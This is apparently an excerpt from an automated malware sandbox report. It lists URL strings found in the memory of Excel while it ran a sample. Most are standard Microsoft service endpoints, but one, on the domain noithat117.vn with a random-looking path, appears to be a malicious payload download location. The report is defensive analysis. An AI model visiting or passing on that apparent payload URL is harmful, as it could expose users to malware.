      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize-
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize.S8
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize7
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize:
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize;
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize=
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize?S
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeC_
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeD
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeE
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeF
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeG
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeH
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeJ
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeK
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeM
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeMf
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeOP
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeR
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeS
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeT
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeU
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeW
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeX
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeY
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeZ
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizea_
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeb
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizec
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizef
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeh
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizei
      Source: EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeize
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizek
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizelQ
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizemP
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizen_
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizep
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizer
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizes
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizesZ
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizeteV
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizex
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorizezP
      Source: EXCEL.EXE, 00000001.00000002.611338171.000000001361A000.00000004.00000001.sdmpString found in binary or memory: https://login.windows.net/common/oauth2/authorize~
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://loki.delve.office.com/api/v1/configuration/officewin32/W
      Source: 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1
      Source: EXCEL.EXE, 00000001.00000003.527855395.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526977901.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339302511.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611671160.00000000137D0000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325294672.00000000137D0000.00000004.00000001.sdmpString found in binary or memory: https://lookup.onenote.com/lookup/geolocation/v1J
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://management.azure.com
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://management.azure.com/
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://management.azure.com/l
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://messaging.office.com/
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://metadata.templates.cdn.office.net/client/log
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://metadata.templates.cdn.office.net/client/log8
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://ncus.contentsync.
      Source: EXCEL.EXE, 00000001.00000003.340165432.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.476324827.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.488905407.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.462619600.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.610948124.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.490100931.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.467872426.000000000FE6F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420012413.000000000FE6F000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://ncus.pagecontentsync.
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000002.603652781.0000000002E30000.00000004.00000020.sdmpString found in binary or memory: https://nexus.officeapps.live.com
      Source: EXCEL.EXE, 00000001.00000002.611303760.00000000135FB000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/
      Source: EXCEL.EXEString found in binary or memory: https://nexus.officeapps.live.com/ne
      Source: EXCEL.EXE, 00000001.00000003.325048483.0000000016780000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nete
      Source: EXCEL.EXEString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules
      Source: EXCEL.EXE, 00000001.00000002.611407310.00000000136A8000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526779002.00000000136A7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rules?Application=excel.exe&Version=16.0.4954.1000&ClientId=
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.com/nexus/rulesn
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://nexus.officeapps.live.comlatesForWord
      Source: EXCEL.EXE, 00000001.00000002.612479351.0000000016745000.00000004.00000001.sdmpString found in binary or memory: https://noithat117.vn/
      Source: EXCEL.EXE, 00000001.00000003.324828323.00000000167C6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526779002.00000000136A7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.418599518.00000000167C6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611442721.00000000136D7000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.419668761.00000000167C6000.00000004.00000001.sdmpString found in binary or memory: https://noithat117.vn/TSh7GBeIR/tiynh.html
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com
      Source: EXCEL.EXE, EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmp, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://o365auditrealtimeingestion.manage.office.com/api/userauditrecord
      Source: EXCEL.EXE, 3638B7F6-A3D7-43B8-AAEC-D8550EE39223.1.drString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.net
      Source: EXCEL.EXE, 00000001.00000003.527794289.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.611602960.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.526918525.000000001373F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.339227200.000000001377E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.325087071.0000000013759000.00000004.00000001.sdmpString found in binary or memory: https://o365diagnosticsppe-web.cloudapp.netW
